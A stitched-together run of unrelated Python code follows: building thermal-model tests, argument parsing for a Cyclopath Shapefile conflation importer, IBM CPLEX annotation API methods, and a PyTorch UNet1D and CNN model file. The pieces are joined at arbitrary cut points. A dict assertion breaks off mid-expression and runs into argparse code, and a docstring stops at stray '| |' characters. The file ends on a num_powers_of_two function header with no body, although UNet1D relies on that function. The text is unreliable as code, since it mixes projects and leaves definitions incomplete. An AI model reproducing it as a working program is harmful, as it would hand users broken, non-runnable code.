net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est4a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est4b(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est4b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est5',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est6',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.type_bldg_est7(
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
neighbour_buildings=None,
construction_type=None,
number_of_apartments=2)
prj.add_residential(
method='urbanrenet',
usage='est7',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est8a',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
prj.add_residential(
method='urbanrenet',
usage='est8b',
name="TestBuilding",
year_of_construction=1988,
number_of_floors=7,
height_of_floors=1,
net_leased_area=1988,
with_ahu=False,
residential_layout=0,
neighbour_buildings=0,
attic=0,
cellar=0,
dormer=0,
construction_type="heavy",
number_of_apartments=1)
# methods in Building
def test_get_inner_wall_area(self):
"""test of get_inner_wall_area"""
prj.set_default()
helptest.building_test2(prj)
sum_area = prj.buildings[-1].get_inner_wall_area()
assert round(sum_area, 1) == 34.0
def test_set_outer_wall_area(self):
"""test of set_outer_wall_area"""
print(prj.buildings[-1].thermal_zones[-1].outer_walls[1].area)
prj.buildings[-1].set_outer_wall_area(2.0, 0.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
print(therm_zone.outer_walls[1].area)
assert round(therm_zone.outer_walls[0].area, 3) == 2.0
assert round(therm_zone.outer_walls[1].area, 3) == 14.0
def test_get_outer_wall_area(self):
"""test of get_outer_wall_area"""
prj.buildings[-1].get_outer_wall_area(0.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.outer_walls[0].area, 3) == 2.0
assert round(therm_zone.outer_walls[1].area, 3) == 14.0
def test_set_window_area(self):
"""test of set_window_area"""
prj.buildings[-1].set_window_area(1.0, 90.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.windows[0].area, 3) == 1.0
def test_get_window_area(self):
"""test of get_window_area"""
prj.buildings[-1].get_window_area(90.0)
therm_zone = prj.buildings[-1].thermal_zones[-1]
assert round(therm_zone.windows[0].area, 3) == 1.0
def test_fill_outer_wall_area_dict(self):
"""test of fill_outer_wall_area_dict"""
prj.buildings[-1].fill_outer_area_dict()
outwall_dict_round = {key: round(value, 2) for key, value in
prj.buildings[-1].outer_area.items()}
assert outwall_dict_round == {-2.0: 140,
# disjoint
# subgraphs.
self.add_argument('--known-point-xy', dest='known_pt_xy',
#action='append', default=[], nargs=2,
action='append',
# This is a point for Mpls-St. Paul/Minnesota.
#default=[480292.5, 4980909.8,],
default=[conf.known_node_pt_x, conf.known_node_pt_y,],
nargs=2,
help='a point on the connected tree; used to find disjoint islands')
# TODO: Delete this feature: this is a hack to accommodate some
# date problems I created.
self.add_argument('--fix-silent-delete-issue',
dest='fix_silent_delete_issue', action='store_true',
default=False, help=
'when new item OPERATION set to old item but old OPERATION empty')
self.add_argument('--use-old-stack-IDs-when-possible',
dest='use_old_stack_IDs_when_possible',
action='store_true', default=False, help=
"when two items are marked duplicates, used older item's stack ID")
# *** Second, preprocess items and create intermediate Shapefiles.
# For line segments, try matching items without a Cyclopath association
# to existing byways.
#
# You can run --init-importer and --try-matching iteratively
# before running --process-edits to clean up the data and
# make changes to this script.
self.add_argument('--try-matching', dest='try_matching',
action='store_true', default=False,
help='search cache for duplicate items (using Hausdorff, etc.)')
self.add_argument('--buffer-threshold', dest='buffer_threshold',
action='store', type=float,
#default=4.0, # 90457 match pairs, 296937 result features.
# FIXME: Test these...
#default=6.0,
default=10.0,
help='line segments within these many meters will be hausdorffed')
self.add_argument('--fragment-minimum', dest='fragment_minimum',
action='store', type=float,
#default=5,
#default=10,
default=4,
help='Fragments shorter than this cannot be trusted')
self.add_argument('--fragment-hausdorff-maximum', dest='frag_haus_max',
action='store', type=float,
#default=5,
default=10,
help=
'a fragment Hausdorff distance below this may indicate duplicates')
#
self.add_argument('--fragment-hausdorff-lenient',
dest='frag_haus_lenient', action='store', type=float,
#default=20,
default=30,
help='Like --fragment-hausdorff-maximum, but for strong addy matches')
self.add_argument('--show-conflations', dest='show_conflations',
action='store_true', default=False,
help='include features for each pair of conflated segments')
# The fragments Shapefiles can be, e.g., ten times larger than the
# everylayer Shapefile, so it's opt-in.
self.add_argument('--show-fragments', dest='show_fragments',
action='store_true', default=False,
help='make fragment geometry Shapefile that shows matching decisions')
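# Hedged illustration of the geometric test the thresholds above drive;
# shapely here is an assumption (the importer's actual matching code lives
# elsewhere), as is treating the two CLI values as plain floats:
# from shapely.geometry import LineString
# seg_a = LineString([(0, 0), (10, 0)])
# seg_b = LineString([(0, 1), (10, 1)])
# if (seg_a.distance(seg_b) <= buffer_threshold
#     and seg_a.hausdorff_distance(seg_b) <= frag_haus_max):
#    pass # candidate duplicate pair worth conflating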
# *** Third, lock down the revision table.
# See: Ccp_Script_Args' --instance-master
self.add_argument('--revision-user', dest='revision_user',
action='store', type=str, required=False, default='',
help='the username for the revision table; anon user if not set')
# *** Fourth, split the import across multiple cores by using
# --instance-worker, --items-limit, and --items-offset,
# and calling either of these two commands.
# Process edited items. This might be adding new ones, or editing or
# deleting existing items.
self.add_argument('--process-edits', dest='process_edits',
action='store_true', default=False,
help='search cache for and process edited features/items')
self.add_argument('--fix-gravel-unpaved-issue',
dest='fix_gravel_unpaved_issue', action='store_true', default=False,
help='remove erroneous gravel and unpaved tags from suspects')
self.add_argument('--merge-names', dest='merge_names',
action='store_true', default=False,
help='intelligently combine street names when merging items')
self.add_argument('--friendly-names', dest='friendly_names',
action='store_true', default=False,
help='convert DOT classifs to friendly names (e.g., MNTH->State Hwy)')
# BUG nnnn: --last-edited-* is not used: Does OpenJUMP support this?
# If you don't want to check every item to see if it's been
# edited, you can do it smartly using a timestamp field.
#
self.add_argument('--last-edited-attr', dest='last_edited_attr',
action='store', type=str, default='',
help='name of the last-edited attribute (improves performance)')
self.add_argument('--last-edited-date', dest='last_edited_date',
action='store', type=str, default='',
help='assume feat unedited unless last-edited on or after this date')
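# Hedged sketch of how --last-edited-attr/--last-edited-date might be used
# downstream (feat and its field format are assumptions, not shown in this
# file): skip features whose timestamp predates the cutoff.
# if self.cli_opts.last_edited_attr:
#    edited = time.mktime(time.strptime(
#       feat.GetField(self.cli_opts.last_edited_attr), '%d %b %Y'))
#    if edited < self.cli_opts.last_edited_date:
#       continue # assume unedited; skip the expensive edit checks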
self.add_argument('--check-everything', dest='check_everything',
action='store_true', default=False,
help='check all in Shapefile and not just feats with Operation')
self.add_argument('--checkout-revision', dest='checkout_revision',
action='store', type=int, default=None,
help='for testing, revision at which to checkout (default: latest)')
# *** Miscellaneous.
self.add_argument('--shapefile-srid', dest='shapefile_srid',
action='store', type=int, default=26915,
help='Shapefile srid to use to make crs')
self.add_argument('--shapefile-driver', dest='shapefile_driver',
action='store', type=str, default='ESRI Shapefile',
help='Shapefile driver to use')
# *** Import/Export the other geofeature types.
self.add_argument('--import', dest='do_import',
action='store_true', default=False,
help='import items from preprocessed Shapefile')
self.add_argument('--export', dest='do_export',
action='store_true', default=False,
help='export items to Shapefile')
# FIXME/BUG nnnn: Speed up vector checkout by eliminating link_values
# APRIL2014 from flashclient; keep them in the database and
# use them on commit, and maybe at other times, but
# limit their use in flashclient to try to speed up
# checkout and rendering and to reduce resource usage.
# Option A:
# 1. When exporting to Shapefile, option to also create
# and populate item cache tables.
# 2. On commit and elesewhere, keep cache table in sync
# with item data.
# 3. Use cache table to send public geometry,
# attributes, and link_value values, etc., to
# clients.
# Option B:
# 1. Remake the geofeature columns for the byway
# attributes (speed limit, etc.) and also make
# a tagged column (e.g., comma-separated text).
# 2. Get link_values for commit, but otherwise
# let client refer to attributes by name and not
# worry about their stack_ids or permissions, etc.
# FIXME/APRIL2014: For now, make sure flashclient isn't lazy-loading
# heavyweight link_values when in viewing mode.
self.add_argument('--item-type', dest='item_type',
action='store', type=str, required=False, default='byway',
help='type of item to import or export, if it cannot be discerned',
choices=('byway', 'region', 'terrain', 'waypoint',))
self.add_argument('--update-geosummary', dest='update_geomsummary',
action='store_true', default=False,
help='call revision.Revision.geosummary_update; skip for big edits')
self.add_argument('--import-fix-mndot-polies',
dest='import_fix_mndot_polies', action='store_true', default=False,
help='convert COUNTYNAME/MUNI_NAME/TWP_NAME to CCP_NAME')
# FIXME: APRIL2014: For re-conflating the State import data, we
# need to indicate the rids around the import, so we can
# ignore items we've edited since the import (since we can
# assume an edited item is considered audited and we don't
# have to try conflating it).
# Perhaps, e.g.,
# --first-suspect ==> --beg-conflation-rid / --fin-conflation-rid
# And/Or, e.g.,
# --first-suspect ==> --first-suspect / --final-suspect
# I.e., caller can specify an rid window or a stack ID window.
# Whatever items were created during the rid window, or
# whatever items' stack IDs fall in the stack ID window,
# are suspect, except those that have been edited since
# the window closed.
#
def verify_handler(self):
ok = Ccp_Script_Args.verify_handler(self)
num_actions = (0
+ (1 if self.cli_opts.init_importer else 0)
+ (1 if self.cli_opts.instance_master else 0)
+ (1 if self.cli_opts.try_matching else 0)
+ (1 if self.cli_opts.process_edits else 0)
+ (1 if self.cli_opts.do_import else 0)
+ (1 if self.cli_opts.do_export else 0)
)
if num_actions != 1:
actions = ['--init-importer',
'--instance-master',
'--try-matching',
'--process-edits',
'--import',
'--export',
]
log.error('Please specify one of %s' % (', '.join(actions),))
ok = False
if not self.cli_opts.init_importer:
self.master_worker_expected = True
if not self.cli_opts.instance_master:
if not self.cli_opts.source_dir:
log.error('Please specify --source-dir with this action')
ok = False
elif ((not self.cli_opts.do_export)
and (not os.path.exists(self.cli_opts.source_dir))):
log.error('The --source-dir was not found: %s'
% (self.cli_opts.source_dir,))
ok = False
if self.cli_opts.last_edited_attr:
if not self.cli_opts.last_edited_date:
log.error('Specify --last-edited-date w/ --last-edited-attr')
ok = False
else:
try:
# E.g., time.strptime('14 Mar 2014', '%d %b %Y')
self.cli_opts.last_edited_date = time.mktime(
time.strptime(self.cli_opts.last_edited_date, '%d %b %Y'))
except ValueError:
log.error('Last edited date should be, e.g., "14 Mar 2014".')
ok = False
if ( (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.init_importer))
and ( #self.cli_opts.known_pt_xy or
self.cli_opts.fix_silent_delete_issue
or self.cli_opts.use_old_stack_IDs_when_possible))
or (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.try_matching))
and ( self.cli_opts.show_conflations
or self.cli_opts.show_fragments))
or (( (self.cli_opts.item_type != 'byway')
or (not self.cli_opts.process_edits))
and ( self.cli_opts.friendly_names))
):
log.error('Incompatible cli switches. See --help')
ok = False
return ok
# *** Hausdorff_Import
class Hausdorff_Import(Ccp_Script_Base):
__slots__ = (
# We collect stats for the curious developer.
'stats',
# We symlink to the latest output Shapefiles (so that we don't
# overwrite previous output).
'target_path',
#
'target_schema',
'intermed_feats',
'slayers', # Shapefile layers, i.e., one layer == one shapefile
'everylayer', # The Everylayer is a copy of all other layers,
# to make searching for items by stack ID easy
# (in OpenJUMP, you search *per layer*, but you
# don't know what layer a random stack ID is in).
# During preprocessing, we count the number of times each unique stack ID
# is referenced so that we know which geofeatures we'll be splitting in
# twain. We use this information to tweak the feature when we write it to
# the intermediate shapefile, so that we can later save to the Cyclopath
# database using a multi-processor-aware approach.
'sid_use_count',
'sid_use_noops',
'sid_del_count',
'sid_del_lists',
'recorded_sids', # Stack IDs we've written to the target Shapefiles.
# FIXME: Rename: CCP_FROMS_ ==> OTHERS_IDS
# FIXME: Rename: DELETE_ ==> OPERATION,
# and change the meaning of Y and N to D and U,
# as in, CRUD.
#
#
#
# A lookup of stack ID to OPERATION indication. This also includes
# CCP_FROMS_ since CCP_FROMS_ is just like OPERATION with stack IDs.
# FIXME: Remove CCP_FROMS_?
'sid_delete_froms', # Stack IDs mentioned by OPERATION and CCP_FROMS_.
# As part of preprocessing, we look for disjoint trees in the forest.
'the_forest', # All nodes, regardless of controlled access.
'sub_forest', # Only uncontrolled-access nodes.
# --------------------------------------------------------------------------
# File: _anno.py
# ---------------------------------------------------------------------------
# Licensed Materials - Property of IBM
# 5725-A06 5725-A29 5724-Y48 5724-Y49 5724-Y54 5724-Y55 5655-Y21
# Copyright IBM Corporation 2008, 2019. All Rights Reserved.
#
# US Government Users Restricted Rights - Use, duplication or
# disclosure restricted by GSA ADP Schedule Contract with
# IBM Corp.
# ------------------------------------------------------------------------
"""Annotation API"""
from ._baseinterface import BaseInterface
from . import _procedural as _proc
from . import _aux_functions as _aux
from . import _constants
class AnnotationObjectType(object):
"""Constants defining annotation object types."""
objective = _constants.CPX_ANNOTATIONOBJ_OBJ
variable = _constants.CPX_ANNOTATIONOBJ_COL
row = _constants.CPX_ANNOTATIONOBJ_ROW
sos_constraint = _constants.CPX_ANNOTATIONOBJ_SOS
indicator_constraint = _constants.CPX_ANNOTATIONOBJ_IND
quadratic_constraint = _constants.CPX_ANNOTATIONOBJ_QC
def __getitem__(self, item):
"""Converts a constant to a string.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> c.long_annotations.object_type.objective
0
>>> c.long_annotations.object_type[0]
'objective'
"""
if item == _constants.CPX_ANNOTATIONOBJ_OBJ:
return "objective"
if item == _constants.CPX_ANNOTATIONOBJ_COL:
return "variable"
if item == _constants.CPX_ANNOTATIONOBJ_ROW:
return "row"
if item == _constants.CPX_ANNOTATIONOBJ_SOS:
return "sos_constraint"
if item == _constants.CPX_ANNOTATIONOBJ_IND:
return "indicator_constraint"
if item == _constants.CPX_ANNOTATIONOBJ_QC:
return "quadratic_constraint"
class AnnotationInterface(BaseInterface):
"""Methods for adding, querying, and modifying annotations."""
object_type = AnnotationObjectType()
"""See `AnnotationObjectType()` """
def _getnumobjtype(self, objtype):
if objtype == self.object_type.objective:
return 1
elif objtype == self.object_type.variable:
return _proc.getnumcols(self._env._e, self._cplex._lp)
elif objtype == self.object_type.row:
return _proc.getnumrows(self._env._e, self._cplex._lp)
elif objtype == self.object_type.sos_constraint:
return _proc.getnumsos(self._env._e, self._cplex._lp)
elif objtype == self.object_type.indicator_constraint:
return _proc.getnumindconstrs(self._env._e, self._cplex._lp)
elif objtype == self.object_type.quadratic_constraint:
return _proc.getnumqconstrs(self._env._e, self._cplex._lp)
else:
raise ValueError("invalid objtype")
class LongAnnotationInterface(AnnotationInterface):
"""Methods for adding, querying, and modifying long annotations."""
benders_annotation = _constants.CPX_BENDERS_ANNOTATION
"""String constant for the name of the Benders annotation."""
benders_mastervalue = _constants.CPX_BENDERS_MASTERVALUE
"""Default value for the Benders master partition."""
def __init__(self, cpx):
"""Creates a new LongAnnotationInterface.
The long annotation interface is exposed by the top-level `Cplex`
class as `Cplex.long_annotations`. This constructor is not meant
to be used externally.
"""
super(LongAnnotationInterface, self).__init__(
cplex=cpx, getindexfunc=_proc.getlongannoindex)
def get_num(self):
"""Returns the number of long annotations in the problem.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> c.long_annotations.get_num()
0
>>> idx = c.long_annotations.add('ann1', 0)
>>> c.long_annotations.get_num()
1
"""
return _proc.getnumlonganno(self._env._e, self._cplex._lp)
def add(self, name, defval):
"""Adds an annotation to the problem.
name: the name of the annotation.
defval: the default value for annotation objects.
Returns the index of the added annotation.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add(name='ann1', defval=0)
>>> c.long_annotations.get_num()
1
"""
# For Python 2.7, int() will automatically upconvert to long
# if necessary. For 3.x, there is only int (they have been
# unified).
def _add(name, defval):
_proc.newlonganno(
self._env._e, self._cplex._lp, name, int(defval),
self._env._apienc)
return self._add_single(self.get_num, _add, name, defval)
def delete(self, *args):
"""Deletes long annotations from the problem.
There are four forms by which long_annotations.delete may be
called.
long_annotations.delete()
deletes all long annotations from the problem.
long_annotations.delete(i)
i must be an annotation name or index. Deletes the long
annotation whose index or name is i.
long_annotations.delete(seq)
seq must be a sequence of annotation names or indices.
Deletes the long annotations with names or indices contained
within seq. Equivalent to [long_annotations.delete(i) for i in seq].
long_annotations.delete(begin, end)
begin and end must be annotation indices or annotation names.
Deletes the long annotations with indices between begin and
end, inclusive of end. Equivalent to
long_annotations.delete(range(begin, end + 1)). This will give
the best performance when deleting batches of long annotations.
See CPXdellongannotations in the Callable Library Reference
Manual for more detail.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> c.long_annotations.get_num()
1
>>> c.long_annotations.delete(idx)
>>> c.long_annotations.get_num()
0
"""
def _delete(begin, end=None):
_proc.dellonganno(self._env._e, self._cplex._lp, begin, end)
_aux.delete_set_by_range(_delete, self._conv, self.get_num(), *args)
def get_names(self, *args):
"""Returns the names of a set of long annotations.
May be called by four forms.
long_annotations.get_names()
return the names of all long annotations in the problem.
long_annotations.get_names(i)
i must be an annotation name or index. Returns the name of
long annotation i.
long_annotations.get_names(seq)
seq must be a sequence of annotation names or indices.
Returns the names of long annotations with names or indices in
seq. Equivalent to
[long_annotations.get_names(i) for i in s]
long_annotations.get_names(begin, end)
begin and end must be annotation indices or annotation names.
Returns the names of long annotations with indices between
begin and end, inclusive of end. Equivalent to
long_annotations.get_names(range(begin, end + 1))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> [c.long_annotations.add('ann{0}'.format(i), i)
... for i in range(1, 6)]
[0, 1, 2, 3, 4]
>>> c.long_annotations.get_names()
['ann1', 'ann2', 'ann3', 'ann4', 'ann5']
>>> c.long_annotations.get_names(0)
'ann1'
>>> c.long_annotations.get_names([0, 2, 4])
['ann1', 'ann3', 'ann5']
>>> c.long_annotations.get_names(1, 3)
['ann2', 'ann3', 'ann4']
"""
def _get_names(idx):
return _proc.getlongannoname(
self._env._e, self._cplex._lp, idx,
self._env._apienc)
return _aux.apply_freeform_one_arg(
_get_names, self._conv, self.get_num(), args)
def get_default_values(self, *args):
"""Returns the default value of a set of long annotations.
May be called by four forms.
long_annotations.get_default_values()
return the default values of all long annotations in the
problem.
long_annotations.get_default_values(i)
i must be an annotation name or index. Returns the default
value of long annotation i.
long_annotations.get_default_values(seq)
seq must be a sequence of annotation names or indices.
Returns the default values of long annotations with names or
indices in seq. Equivalent to
[long_annotations.get_default_values(i) for i in s]
long_annotations.get_default_values(begin, end)
begin and end must be annotation indices or annotation names.
Returns the default values of long annotations with indices
between begin and end, inclusive of end. Equivalent to
long_annotations.get_default_values(list(range(begin, end + 1)))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx1 = c.long_annotations.add(name='ann1', defval=0)
>>> idx2 = c.long_annotations.add(name='ann2', defval=1)
>>> c.long_annotations.get_default_values()
[0, 1]
"""
def _getdefval(idx):
return _proc.getlongannodefval(
self._env._e, self._cplex._lp, idx)
return _aux.apply_freeform_one_arg(
_getdefval, self._conv, self.get_num(), args)
def set_values(self, idx, objtype, *args):
"""Sets the values for objects in the specified long annotation.
idx: the long annotation index or name.
objtype: the annotation object type.
Can be called by two forms:
long_annotations.set_values(idx, objtype, i, val)
i must be a name or index. Changes the long annotation value
of the object identified by i.
long_annotations.set_values(idx, objtype, seq)
seq is a sequence of pairs (i, val) as described above.
Changes the long annotation values for the specified objects.
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> objtype = c.long_annotations.object_type.objective
>>> c.long_annotations.set_values(idx, objtype, 0, 1)
>>> c.long_annotations.get_values(idx, objtype, 0)
1
>>> indices = c.variables.add(names=['v1', 'v2', 'v3'])
>>> objtype = c.long_annotations.object_type.variable
>>> c.long_annotations.set_values(idx, objtype,
... [(i, 1) for i in indices])
>>> c.long_annotations.get_values(idx, objtype)
[1, 1, 1]
"""
def _set_values(ind, val):
_proc.setlonganno(self._env._e, self._cplex._lp,
self._conv(idx), objtype, ind, val)
_aux.apply_pairs(_set_values, self._conv, *args)
def get_values(self, idx, objtype, *args):
"""Returns the long annotation values for the specified objects.
idx: the long annotation index or name.
objtype: the annotation object type.
Can be called by four forms:
long_annotations.get_values(idx, objtype)
return the values of all objects for a given annotation.
long_annotations.get_values(idx, objtype, i)
i must be a name or index. Returns the long annotation value
of the object identified by i.
long_annotations.get_values(idx, objtype, seq)
seq is a sequence of object names or indices. Returns the
long annotation values for the specified objects. Equivalent
to
[long_annotations.get_values(idx, objtype, i) for i in seq]
long_annotations.get_values(idx, objtype, begin, end)
begin and end must be object indices or object names. Returns
the long annotation values of objects with indices between
begin and end, inclusive of end. Equivalent to
long_annotations.get_values(idx, objtype, range(begin, end + 1))
Example usage:
>>> import cplex
>>> c = cplex.Cplex()
>>> idx = c.long_annotations.add('ann1', 0)
>>> objtype = c.long_annotations.object_type.objective
>>> c.long_annotations.set_values(idx, objtype, 0, 1)
>>> c.long_annotations.get_values(idx, objtype, 0)
1
>>> indices = c.variables.add(names=['v1', 'v2', 'v3'])
>>> objtype = c.long_annotations.object_type.variable
>>> c.long_annotations.set_values(idx, objtype,
... [(i, 1) for i in indices])
>>> c.long_annotations.get_values(idx, objtype, list(indices))
[1, 1, 1]
"""
def _get_values(begin, end=self._getnumobjtype(objtype) - 1):
return _proc.getlonganno(self._env._e, self._cplex._lp,
self._conv(idx), objtype,
begin, end)
return _aux.apply_freeform_two_args(
_get_values, self._conv, args)
class DoubleAnnotationInterface(AnnotationInterface):
"""Methods for adding, querying, and modifying double annotations."""
def __init__(self, cpx):
"""Creates a new DoubleAnnotationInterface.
The double annotation interface is exposed by the top-level
`Cplex` class as `Cplex.double_annotations`. This constructor is
not meant to be used externally.
"""
super(DoubleAnnotationInterface, self).__init__(
cplex=cpx, getindexfunc=_proc.getdblannoindex)
def get_num(self):
"""Returns the number of double annotations in the | |
<filename>model.py
import torch
import torch.nn as nn
from torch.nn import TransformerEncoder, TransformerEncoderLayer
import pdb
import math
from torch.nn import Linear, ReLU, CrossEntropyLoss, Sequential, Conv2d, MaxPool2d, Module, Softmax, BatchNorm2d, Dropout
import torch.nn.functional as F
class ConvNormRelu(nn.Module):
def __init__(self, in_channels, out_channels,
type='1d', leaky=False,
downsample=False, kernel_size=None, stride=None,
padding=None, p=0, groups=1):
super(ConvNormRelu, self).__init__()
if kernel_size is None and stride is None:
if not downsample:
kernel_size = 3
stride = 1
else:
kernel_size = 4
stride = 2
if padding is None:
if isinstance(kernel_size, int) and isinstance(stride, tuple):
padding = tuple(int((kernel_size - st)/2) for st in stride)
elif isinstance(kernel_size, tuple) and isinstance(stride, int):
padding = tuple(int((ks - stride)/2) for ks in kernel_size)
elif isinstance(kernel_size, tuple) and isinstance(stride, tuple):
assert len(kernel_size) == len(stride), 'dims in kernel_size are {} and stride are {}. They must be the same'.format(len(kernel_size), len(stride))
padding = tuple(int((ks - st)/2) for ks, st in zip(kernel_size, stride))
else:
padding = int((kernel_size - stride)/2)
in_channels = in_channels*groups
out_channels = out_channels*groups
if type == '1d':
self.conv = nn.Conv1d(in_channels=in_channels, out_channels=out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
groups=groups)
self.norm = nn.BatchNorm1d(out_channels)
self.dropout = nn.Dropout(p=p)
elif type == '2d':
self.conv = nn.Conv2d(in_channels=in_channels, out_channels=out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
groups=groups)
self.norm = nn.BatchNorm2d(out_channels)
self.dropout = nn.Dropout2d(p=p)
if leaky:
self.relu = nn.LeakyReLU(negative_slope=0.2)
else:
self.relu = nn.ReLU()
def forward(self, x, **kwargs):
return self.relu(self.norm(self.dropout(self.conv(x))))
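# Hedged usage sketch (shapes are illustrative): with downsample=True the
# defaults above give kernel 4 / stride 2 / padding 1, halving the length.
# blk = ConvNormRelu(64, 128, type='1d', downsample=True)
# y = blk(torch.randn(8, 64, 32)) # -> torch.Size([8, 128, 16])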
class CNN(nn.Module):
def __init__(self):
super().__init__()
# Convolution 1
self.cnn1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, stride=1, padding=0)
self.relu1 = nn.ReLU()
# Max pool 1
self.maxpool1 = nn.MaxPool2d(kernel_size=2)
# Convolution 2
self.cnn2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, stride=1, padding=0)
self.relu2 = nn.ReLU()
# Max pool 2
self.maxpool2 = nn.MaxPool2d(kernel_size=2)
# Fully connected 1
self.fc1 = nn.Linear(32 * 5 * 5, 10)
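# Note: 32 * 5 * 5 implies 28x28 inputs (28 -> conv3 -> 26 -> pool2 -> 13
# -> conv3 -> 11 -> pool2 -> 5); this input size is an assumption, not
# stated in the original file.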
def forward(self, state, desc):
# Set 1
x = state
out = self.cnn1(x)
out = self.relu1(out)
out = self.maxpool1(out)
# Set 2
out = self.cnn2(out)
out = self.relu2(out)
out = self.maxpool2(out)
#Flatten
out = out.view(out.size(0), -1)
#Dense
out = self.fc1(out)
#pdb.set_trace()
return out
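# num_powers_of_two is referenced by UNet1D.forward below but never defined
# or imported in this file; this is a minimal sketch of what it presumably
# computes (the exponent of 2 in n, i.e. how many times n divides by 2).
def num_powers_of_two(n):
    count = 0
    while n > 0 and n % 2 == 0:
        n //= 2
        count += 1
    return count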
class UNet1D(nn.Module):
'''
UNet model for 1D inputs
(cite: ``https://arxiv.org/pdf/1505.04597.pdf``)
Arguments
input_channels (int): input channel size
output_channels (int): output channel size (or the number of output features to be predicted)
max_depth (int, optional): depth of the UNet (default: ``5``).
kernel_size (int, optional): size of the kernel for each convolution (default: ``None``)
stride (int, optional): stride of the convolution layers (default: ``None``)
Shape
Input: :math:`(N, C_{in}, L_{in})`
Output: :math:`(N, C_{out}, L_{out})` where
.. math::
L_{in} \geq 2^{max\_depth - 1}
L_{out} = L_{in}
C_{out} = output_channels
Inputs
x (torch.Tensor): speech signal in form of a 3D Tensor
Outputs
x (torch.Tensor): input transformed to a lower frequency
latent vector
'''
def __init__(self, input_channels, output_channels, max_depth=5, kernel_size=None, stride=None, p=0, groups=1):
super(UNet1D, self).__init__()
self.pre_downsampling_conv = nn.ModuleList([])
self.conv1 = nn.ModuleList([])
self.conv2 = nn.ModuleList([])
self.upconv = nn.Upsample(scale_factor=2, mode='nearest')
self.max_depth = max_depth
self.groups = groups
## pre-downsampling
self.pre_downsampling_conv.append(ConvNormRelu(input_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
self.pre_downsampling_conv.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
for i in range(self.max_depth):
self.conv1.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=True,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
for i in range(self.max_depth):
self.conv2.append(ConvNormRelu(output_channels, output_channels,
type='1d', leaky=True, downsample=False,
kernel_size=kernel_size, stride=stride, p=p, groups=groups))
    def forward(self, x, return_bottleneck=False, return_feats=False, feats=None):
        feats = [] if feats is None else feats  # avoid the mutable default argument pitfall
        input_size = x.shape[-1]
assert input_size/(2**(self.max_depth - 1)) >= 1, 'Input size is {}. It must be >= {}'.format(input_size, 2**(self.max_depth - 1))
#assert np.log2(input_size) == int(np.log2(input_size)), 'Input size is {}. It must be a power of 2.'.format(input_size)
assert num_powers_of_two(input_size) >= self.max_depth, 'Input size is {}. It must be a multiple of 2^(max_depth) = 2^{} = {}'.format(input_size, self.max_depth, 2**self.max_depth)
x = nn.Sequential(*self.pre_downsampling_conv)(x)
residuals = []
residuals.append(x)
for i, conv1 in enumerate(self.conv1):
x = conv1(x)
if i < self.max_depth - 1:
residuals.append(x)
bn = x
for i, conv2 in enumerate(self.conv2):
x = self.upconv(x) + residuals[self.max_depth - i - 1]
x = conv2(x)
if return_feats:
feats.append(x)
if return_feats:
return x, feats
elif return_bottleneck:
return x, bn
else:
return x
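# UNet1D.forward references num_powers_of_two, which is not defined in this
# excerpt; a plausible definition is sketched here as an assumption (the number of
# times 2 divides n), under which the assert enforces divisibility by 2^max_depth.
def num_powers_of_two(n):
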